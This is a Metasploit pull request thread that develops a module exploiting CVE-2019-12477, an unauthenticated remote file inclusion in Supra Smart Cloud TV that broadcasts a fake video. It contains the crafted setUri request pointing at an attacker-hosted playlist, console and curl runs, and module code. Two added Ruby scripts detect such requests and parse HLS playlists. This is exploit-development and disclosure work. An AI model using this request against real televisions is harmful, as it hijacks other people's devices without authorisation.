Supra Smart Cloud TV RFI fake broadcast (CVE-2019-12477) #11952

Merged
merged 13 commits into from Jun 28, 2019

4 participants
@RootUp (Contributor) commented Jun 6, 2019

Summary

This module exploits an unauthenticated remote file inclusion which
exists in Supra Smart Cloud TV. The media control for the device doesn't
have any session management or authentication. Leveraging this, an
attacker on the local network can send a crafted request to broadcast a
fake video.

Steps to verify

msf5 > use auxiliary/admin/http/supra_smart_cloud_tv_rfi 
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > set SRVHOST 192.168.1.132
SRVHOST => 192.168.1.132
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > set RHOSTS 192.168.1.155
RHOSTS => 192.168.1.155
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > run
[*] Running module against 192.168.1.155
[*] Using URL: http://192.168.1.132:8080/
[*] Broadcasting Epic Sax Guy to 192.168.1.155:80
[+] Doo-doodoodoodoodoo-doo
[*] Sleeping for 10s serving .m3u8 and .ts files...
[*] Server stopped.
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > 

Technical observation

Supra Smart Cloud TV allows remote file inclusion in the openLiveURL function, which allows a local attacker to broadcast fake video without any authentication via a /remote/media_control?action=setUri&uri=URI request.

Vulnerable GET request

GET /remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8 HTTP/1.1
Host: 192.168.1.155
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Example:
http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8

However, I am still stuck on serving the .m3u8 file; my idea was to have a small video inside our MSF data/ folder and call it directly when the module is run.

References
GitHub : #11943
Blog: https://www.inputzero.io/2019/06/hacking-smart-tv.html
Video PoC: https://www.youtube.com/watch?v=2babA1KVpdw
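Because the media control endpoint has no session or authentication, the only control available on a flat network is to notice when something on the LAN pushes a playlist URL to the TV. The following Ruby script is an added example (not code from this PR or from the Metasploit module) that scans HTTP request lines, as they would appear in a pcap or proxy log, for setUri calls and reports the decoded target and its host. The request lines are constructed to mirror the two forms seen in this thread, one percent-encoded and one not; MEDIA_CONTROL_PATH and the function names are mine.

```ruby
# Added example: flag media_control setUri requests in captured HTTP request
# lines. Not part of the PR or the Metasploit module; sample lines are constructed.
require 'cgi'
require 'uri'

MEDIA_CONTROL_PATH = '/remote/media_control'

# Parse one "METHOD /path?query HTTP/1.x" request line into its pieces.
# Returns nil for anything that is not a request line.
def parse_request_line(line)
  m = line.match(%r{\A(?<method>[A-Z]+)\s+(?<target>\S+)\s+HTTP/\d\.\d\z})
  return nil unless m
  path, query = m[:target].split('?', 2)
  # CGI.parse splits on & and percent-decodes, so "http%3a//" becomes "http://"
  params = CGI.parse(query.to_s).transform_values(&:first)
  { method: m[:method], path: path, params: params }
end

# Return the decoded uri value when the request is a setUri call, else nil.
def set_uri_target(req)
  return nil unless req && req[:path] == MEDIA_CONTROL_PATH
  return nil unless req[:params]['action'] == 'setUri'
  req[:params]['uri']
end

# Report every setUri call as {uri:, host:} so an analyst can see which
# machine on the LAN is pointing the TV at a playlist.
def find_set_uri_calls(lines)
  lines.each_with_object([]) do |line, found|
    target = set_uri_target(parse_request_line(line))
    next unless target
    host = begin
      URI.parse(target).host
    rescue URI::InvalidURIError
      nil   # keep the hit even if the value is not a clean URL
    end
    found << { uri: target, host: host }
  end
end

# Constructed sample: two setUri calls modelled on this thread plus benign traffic.
SAMPLE_LINES = [
  'GET /remote/media_control?action=setUri&uri=http%3a//192.168.1.132%3a8080/znAgiud31Y7 HTTP/1.1',
  'GET /remote/media_control?action=setUri&uri=http://192.168.1.132:8080/epicsax.m3u8 HTTP/1.1',
  'GET /remote/media_control?action=pause HTTP/1.1',
  'GET /remote/favicon.ico HTTP/1.1'
].freeze

if __FILE__ == $PROGRAM_NAME
  find_set_uri_calls(SAMPLE_LINES).each do |hit|
    puts "setUri from #{hit[:host]}: #{hit[:uri]}"
  end
end
```

Both encodings decode to the same target, which matters because a later comment in this thread changes the module from encoded to plain parameters; a detection that only matched the literal string `uri=http://` would miss the encoded form.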

@h00die (Contributor) commented Jun 6, 2019

It looks like m3u8 files are text files which can take URLs, so why not make a datastore option for something like 'videourl' with a default of https://youtu.be/kxopViU98Xo?
Then you don't have to host yourself or add a video file to msf.

@wvu-r7 (Contributor) commented Jun 7, 2019

@RootUp: Can you provide your .m3u8 file?

@h00die: Usually, .m3u(8) files reference raw audio or video sources, so I'm not sure YouTube would work directly... but there is always a way. I think we need more Epic Sax Guy.

@RootUp (Contributor, Author) commented Jun 7, 2019

Hi @wvu-r7,
Here is my .m3u8 file. I've used ffmpeg to convert .mp4 to .m3u8, although there are .TS (typescript) files as supporting files to play the .m3u8.

Cmd: ffmpeg -i epicsax.mp4 -hls_list_size 0 epicsax.m3u8

wvu-r7 added some commits Jun 7, 2019

@wvu-r7 (Contributor) commented Jun 7, 2019

Please review the commits I've pushed. I've added minimal HttpServer support. The rest is on you!

@RootUp (Contributor, Author) commented Jun 9, 2019

Thank you @wvu-r7

Also, I cannot send raw for .m3u8 under request.uri.

  def on_request_uri(cli, request)
    print_status("Sending #{request.uri}")
    # the pattern after =~ was left blank in the comment as posted
    if request.uri =~
      send_response(cli, request)
    else
      print_status("Something went wrong")
    end
  end

Or am I supposed to use File.join(Msf::Config.data_directory) to call .m3u8 files?

@wvu-r7 (Contributor) commented Jun 9, 2019

I would use a file in the data directory, yes. You can use File.read with File.join. Look around for examples.

@wvu-r7 wvu-r7 added the delayed label Jun 10, 2019

@RootUp (Contributor, Author) commented Jun 10, 2019

I tried using File.join; this performs the RFI to the TV, but apparently the fake video doesn't run properly, or am I missing something?

  def on_request_uri(cli, request)
    print_status("Sending #{request.uri}")
    # playlist shipped with the module under data/exploits/CVE-2019-12477
    path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-12477', 'epicsax.m3u8')
    # read the playlist in binary mode and serve it as the response body
    body = ::File.open(path, 'rb') { |fd| fd.read(fd.stat.size) }
    send_response(cli, body)
  end
@wvu-r7 (Contributor) commented Jun 10, 2019

Try set HttpTrace true and compare your requests to curl -v.

@RootUp (Contributor, Author) commented Jun 10, 2019

From MSF:

msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > run
[*] Running module against 192.168.1.155

[*] Using URL: http://192.168.1.132:8080/znAgiud31Y7
********************
####################
# Request:
####################
GET /remote/media_control?action=setUri&uri=http%3a//192.168.1.132%3a8080/znAgiud31Y7 HTTP/1.1
Host: 192.168.1.155
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded


####################
# Response:
####################
HTTP/1.1 200 OK 
Set-Cookie: JSESSIONID=d1d7af53-44f3-4559-ac22-5f904b258084
Date: Mon, 10 Jun 2019 18:11:11 GMT
Connection: keep-alive
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 403
Server: EShare Http Server/1.0

<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="/remote/favicon.ico" mce_href="/remote/favicon.ico" type="image/x-icon">
<title>OK</title>
</head>

<body>
OK
</body>
</html>

[+] Fake video was broadcasted
[*] Server stopped.
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > 

Curl:

$ curl -v http://192.168.1.155/remote/media_control?action=setUri&uri=http://192.168.1.132:9090/epicsax.m3u8
[1] 9819
$ *   Trying 192.168.1.155...
* TCP_NODELAY set
* Connected to 192.168.1.155 (192.168.1.155) port 80 (#0)
> GET /remote/media_control?action=setUri HTTP/1.1
> Host: 192.168.1.155
> User-Agent: curl/7.58.0
> Accept: */*
> 
< HTTP/1.1 200 OK 
< Set-Cookie: JSESSIONID=d1cbefb4-5f90-4ad0-9586-54bd3208ecea
< Date: Mon, 10 Jun 2019 18:14:18 GMT
< Connection: keep-alive
< Accept-Ranges: bytes
< Content-Type: text/html
< Content-Length: 403
< Server: EShare Http Server/1.0
< 
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="/remote/favicon.ico" mce_href="/remote/favicon.ico" type="image/x-icon">
<title>OK</title>
</head>

<body>
OK
</body>
</html>
* Connection #0 to host 192.168.1.155 left intact

[1]+  Done                    curl -v http://192.168.1.155/remote/media_control?action=setUri
$ 
@wvu-r7 (Contributor) commented Jun 10, 2019

You probably want an .m3u8 extension on your HttpServer URL. You can change that with URIPATH or Path to start_service directly.

@wvu-r7 (Contributor) commented Jun 10, 2019

You should quote your URL to curl, too... & is breaking apart your command.

@wvu-r7 (Contributor) commented Jun 20, 2019

@RootUp: How's it going?

@RootUp (Contributor, Author) commented Jun 20, 2019

Hi @wvu-r7, apologies for the delay. I tried adding .m3u8 extensions on my HttpServer but couldn't do so; I need some suggestions on code from your end to get this completed. Aside from that, I was on leave for a week.

@wvu-r7 (Contributor) commented Jun 20, 2019

I'll take a stab at completing this without access to a test device. Can you test for me?

@wvu-r7 wvu-r7 self-assigned this Jun 20, 2019

@RootUp (Contributor, Author) commented Jun 21, 2019

Yes, I still have access to the device I can test it.

@wvu-r7 (Contributor) commented Jun 26, 2019

Testing your .m3u8 and .ts files:

wvu@kharak:~$ mplayer -vo matrixview -loop 0 http://localhost:8080/epicsax.m3u8
wvu@kharak:~/Downloads/sax$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
127.0.0.1 - - [25/Jun/2019 22:18:33] "GET /epicsax.m3u8 HTTP/1.0" 200 -
127.0.0.1 - - [25/Jun/2019 22:18:33] "GET /epicsax0.ts HTTP/1.1" 200 -
127.0.0.1 - - [25/Jun/2019 22:18:36] "GET /epicsax1.ts HTTP/1.1" 200 -
127.0.0.1 - - [25/Jun/2019 22:18:38] "GET /epicsax2.ts HTTP/1.1" 200 -
127.0.0.1 - - [25/Jun/2019 22:18:39] "GET /epicsax3.ts HTTP/1.1" 200 -
127.0.0.1 - - [25/Jun/2019 22:18:41] "GET /epicsax4.ts HTTP/1.1" 200 -

Good so far, working on module now.
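The server log above shows why the module has to serve more than the playlist: the player reads the .m3u8, then fetches every segment it lists, one after another, for as long as the playlist lasts. The following Ruby script is an added example (not code from this PR or from the Metasploit module) with a minimal parser for the HLS media playlist that ffmpeg's hls muxer writes. The playlist text is constructed to resemble that output with shortened durations; the third segment is given an absolute URL on a made-up host to show that segments need not sit next to the playlist. Function names and the sample URLs are mine.

```ruby
# Added example: parse an HLS media playlist and list the segment URLs a player
# will request. Not part of the PR or the module; the playlist below is constructed.
require 'uri'

# Constructed sample in the shape of "ffmpeg -i epicsax.mp4 -hls_list_size 0 epicsax.m3u8" output
SAMPLE_PLAYLIST = <<~M3U8
  #EXTM3U
  #EXT-X-VERSION:3
  #EXT-X-TARGETDURATION:3
  #EXT-X-MEDIA-SEQUENCE:0
  #EXTINF:2.500000,
  epicsax0.ts
  #EXTINF:2.000000,
  epicsax1.ts
  #EXTINF:1.500000,
  http://cdn.example.invalid/epicsax2.ts
  #EXT-X-ENDLIST
M3U8

# Parse a media playlist into [{url:, duration:}, ...], resolving relative
# segment names against the playlist's own URL the way a player does.
def hls_segments(text, playlist_url)
  base = URI.parse(playlist_url)
  segments = []
  pending = nil
  text.each_line(chomp: true) do |raw|
    line = raw.strip
    next if line.empty?
    if line.start_with?('#EXTINF:')
      # "#EXTINF:<duration>,<title>" announces the next segment's duration
      pending = line.delete_prefix('#EXTINF:').split(',', 2).first.to_f
    elsif line.start_with?('#')
      next   # other tags (version, target duration, endlist) carry no segment
    else
      segments << { url: URI.join(base, line).to_s, duration: pending || 0.0 }
      pending = nil
    end
  end
  segments
end

# Hosts the player will contact while playing, in first-seen order.
def segment_hosts(segments)
  segments.map { |s| URI.parse(s[:url]).host }.uniq
end

# Seconds the server must stay up for the playlist to play through.
def playlist_duration(segments)
  segments.sum { |s| s[:duration] }
end

if __FILE__ == $PROGRAM_NAME
  segs = hls_segments(SAMPLE_PLAYLIST, 'http://192.168.1.132:8080/epicsax.m3u8')
  segs.each { |s| puts format('%-45s %.1fs', s[:url], s[:duration]) }
  puts "hosts contacted: #{segment_hosts(segs).join(', ')}"
  puts "total play time: #{playlist_duration(segs)}s"
end
```

Two things follow for anyone serving or inspecting such a playlist: the sum of the EXTINF durations is the minimum time the HTTP server must keep answering, and a playlist can send the player to hosts other than the one that served it, so the set of hosts in the segment list is worth checking on the receiving side.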

@RootUp (Contributor, Author) commented Jun 26, 2019

Hi @wvu-r7
I tried testing this module against the TV; it sends the request but the video is not played, and the TV gives a warning which says "Don't support and exit!". Aside from that, I manually tried with the same video file and .ts file via curl and was able to broadcast the video.

From MSF:

msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > run
[*] Running module against 192.168.1.155

[*] Using URL: http://192.168.1.132:8080/
[*] Sending fake broadcast to 192.168.1.155:80
********************
####################
# Request:
####################
GET /remote/media_control?action=setUri&uri=http%3a//192.168.1.132%3a8080/epicsax.m3u8 HTTP/1.1
Host: 192.168.1.155
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded


####################
# Response:
####################
HTTP/1.1 200 OK 
Set-Cookie: JSESSIONID=8bd19ba3-108d-4494-b66d-ad08a9d56bb0
Date: Wed, 26 Jun 2019 05:28:05 GMT
Connection: keep-alive
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 403
Server: EShare Http Server/1.0

<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="/remote/favicon.ico" mce_href="/remote/favicon.ico" type="image/x-icon">
<title>OK</title>
</head>

<body>
OK
</body>
</html>

[+] Fake video was broadcasted
[*] Server stopped.
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) >

From curl:

$ curl -v "http://192.168.1.155/remote/media_control?action=setUri&uri=http://192.168.1.132:9090/epicsax.m3u8"
*   Trying 192.168.1.155...
* TCP_NODELAY set
* Connected to 192.168.1.155 (192.168.1.155) port 80 (#0)
> GET /remote/media_control?action=setUri&uri=http://192.168.1.132:9090/epicsax.m3u8 HTTP/1.1
> Host: 192.168.1.155
> User-Agent: curl/7.58.0
> Accept: */*
> 
< HTTP/1.1 200 OK 
< Set-Cookie: JSESSIONID=76b23bce-ef93-4290-b5fd-44626719908e
< Date: Wed, 26 Jun 2019 05:25:46 GMT
< Connection: keep-alive
< Accept-Ranges: bytes
< Content-Type: text/html
< Content-Length: 403
< Server: EShare Http Server/1.0
< 
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="/remote/favicon.ico" mce_href="/remote/favicon.ico" type="image/x-icon">
<title>OK</title>
</head>

<body>
OK
</body>
</html>
* Connection #0 to host 192.168.1.155 left intact
@wvu-r7 (Contributor) commented Jun 26, 2019

Hi, please try again with the new commit. Maybe the TV can't handle encoded params.

@RootUp (Contributor, Author) commented Jun 26, 2019

Hi @wvu-r7, I tried running the latest commit against the TV, although we are still failing here: the TV gives a warning of "Don't support and exit!". I also tried sending custom headers via 'headers' => but no luck so far.

It's strange because the .m3u8 and .ts files stored in my exploits/CVE-2019-12477, when used/run manually via curl, work perfectly and the video is broadcast.

msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > run
[*] Running module against 192.168.1.155

[*] Using URL: http://192.168.1.132:8080/
[*] Sending fake broadcast to 192.168.1.155:80
********************
####################
# Request:
####################
GET /remote/media_control?action=setUri&uri=http://192.168.1.132:8080/epicsax.m3u8 HTTP/1.1
Host: 192.168.1.155
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded


####################
# Response:
####################
HTTP/1.1 200 OK 
Set-Cookie: JSESSIONID=fea734dc-0351-4fcd-bdbc-1d37bcc92a5c
Date: Wed, 26 Jun 2019 15:00:37 GMT
Connection: keep-alive
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 403
Server: EShare Http Server/1.0

<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="/remote/favicon.ico" mce_href="/remote/favicon.ico" type="image/x-icon">
<title>OK</title>
</head>

<body>
OK
</body>
</html>

[+] Fake video was broadcasted
[*] Server stopped.
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > 
@wvu-r7 (Contributor) commented Jun 27, 2019

Can you upload a pcap? Or are you willing to fix the issue?

@RootUp (Contributor, Author) commented Jun 27, 2019

Hi @wvu-r7
I've shared the pcap file on msfdev [at] metasploit [.] com. Please let me know if you want me to share it here.

@wvu-r7 (Contributor) commented Jun 27, 2019

In the Metasploit pcap, I don't see any requests from the TV for the .m3u8 or .ts files.

I noticed you're using different service ports: 8080 for Metasploit and 9090 for SimpleHTTP/0.6 Python/2.7.15+. You sure the TV can reach Metasploit? Firewall?

@RootUp (Contributor, Author) commented Jun 28, 2019

Hi @wvu-r7, I tried this on a different host by disabling the firewall, but it didn't work out.

@wvu-r7 (Contributor) commented Jun 28, 2019

@RootUp: I found a bug. Since this isn't an exploit with a handler, I need to sleep at the end of run for on_request_uri to have time to handle requests. I'll push up a patch. Are you around to test?

@RootUp (Contributor, Author) commented Jun 28, 2019

I see, yeah, I am up and will test right away.

@wvu-r7 (Contributor) commented Jun 28, 2019

Please try again. If it doesn't work, we can try sending the exact request that worked.

@wvu-r7 (Contributor) commented Jun 28, 2019

The pcap seems to confirm this bug.

25	2.684986486	[TV]	[You]	57751	8080	TCP	74	57751 → 8080 [SYN] Seq=0 Win=14600 Len=0 MSS=1460 SACK_PERM=1 TSval=41124 TSecr=0 WS=64
26	2.685038299	[You]	[TV]	8080	57751	TCP	54	8080 → 57751 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0

And yeah, no firewall, since that's clearly a RST instead of a timeout! (Unless your firewall was configured to return RSTs.)

@RootUp (Contributor, Author) commented Jun 28, 2019

I tested the latest commit; this works perfectly, it was able to broadcast the video. Please give me some time so that I can push docs and upload the latest PCAP file for your reference. Then we are probably good to land.

@wvu-r7 (Contributor) commented Jun 28, 2019

Awesome, thanks! I am sorry it took so long. I should have paid more attention to the pcap! Ironically, I noticed the module bug first. 😅

@wvu-r7 wvu-r7 changed the title [WIP] Supra smart cloud TV - CVE 2019 12477 Supra Smart Cloud TV RFI fake broadcast (CVE-2019-12477) Jun 28, 2019

@wvu-r7 wvu-r7 removed the delayed label Jun 28, 2019

@wvu-r7 wvu-r7 added feature and removed needs-docs labels Jun 28, 2019

@RootUp (Contributor, Author) commented Jun 28, 2019

Sample Output:

msf5 > use auxiliary/admin/http/supra_smart_cloud_tv_rfi 
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > set SRVHOST 192.168.1.132
SRVHOST => 192.168.1.132
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > set RHOSTS 192.168.1.155
RHOSTS => 192.168.1.155
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > run
[*] Running module against 192.168.1.155
[*] Using URL: http://192.168.1.132:8080/
[*] Broadcasting Epic Sax Guy to 192.168.1.155:80
[+] Doo-doodoodoodoodoo-doo
[*] Sleeping for 10s serving .m3u8 and .ts files...
[*] Server stopped.
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > 

Also, I've emailed the latest PCAP file for your reference. I've added the documentation and am waiting for the Travis checks to pass.

Removing comments
Thanks wvu-r7 for your support.
@RootUp (Contributor, Author) commented Jun 28, 2019

Hi @wvu-r7, I've made the necessary changes, please have a look; hope we are good to land.

@wvu-r7 (Contributor) commented Jun 28, 2019

Release Notes

This adds a module to send a fake video broadcast to a Supra Smart Cloud TV via a remote file inclusion in its web interface.

@wvu-r7 wvu-r7 merged commit 09d6ae3 into rapid7:master Jun 28, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed

wvu-r7 added a commit that referenced this pull request Jun 28, 2019

msjenkins-r7 added a commit that referenced this pull request Jun 28, 2019
